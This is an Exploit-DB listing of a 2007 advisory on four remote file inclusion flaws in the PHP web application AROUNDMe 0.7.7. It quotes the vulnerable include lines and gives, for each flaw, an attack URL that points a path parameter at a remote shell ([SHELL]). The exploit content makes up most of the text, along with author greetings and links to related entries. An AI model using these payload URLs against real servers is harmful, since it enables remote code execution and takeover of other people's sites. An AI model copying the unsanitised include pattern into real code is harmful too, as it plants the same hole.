Exploit

EDB-ID: 3659	Author: kezzap66345	Published: 2007-04-04
CVE: CVE-2007-1986	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: N/A	Tags: Vulnerability
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App:

« Previous Exploit Next Exploit »

AROUNDMe  _0_7_7
*****************
Found by kezzap66345 *
*****************
*****************
Script
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz

*****************
*****************
ERROR#1:
File:\components\core\inc\core_profile.header.php
*****************


include_once($language_path_core . 'inc/me_common.inc.php');     <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]


**************************************************************************************

*****************
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************

<?php
                       include $template_path_core . "inc/comment.inc.php";
                       ?> <<< rfi coded


**************************************************************************************
RFI#2:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]




ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
*****************


include_once($template_path . "inc/menu_" . $section . ".inc.php");    <<< rfi coded


**************************************************************************************
RFI#3:

http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]


**************************************************************************************

*****************
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
include($template_path_core . "inc/form_gui_html_editor.inc.php");    <<<
rfi coded


**************************************************************************************
RFI#4:

http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************

# milw0rm.com [2007-04-04]

Related Exploits

Trying to match CVEs (1): CVE-2007-1986
Trying to match OSVDBs (3): 34623, 34624, 34625
Trying to match setup file: 0ad23d2a4c969771586187b2239fac5d
Other Possible E-DB Search Terms: AROUNDMe 0.7.7, AROUNDMe

Date	D	V	Title	Author
2006-10-15			AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion	Kw3[R]Ln
2009-12-06			AROUNDMe 1.1 - (language_path) Remote File Inclusion	cr4wl3r

AROUNDMe 0.7.7 - Multiple Remote File Inclusion

Related Exploits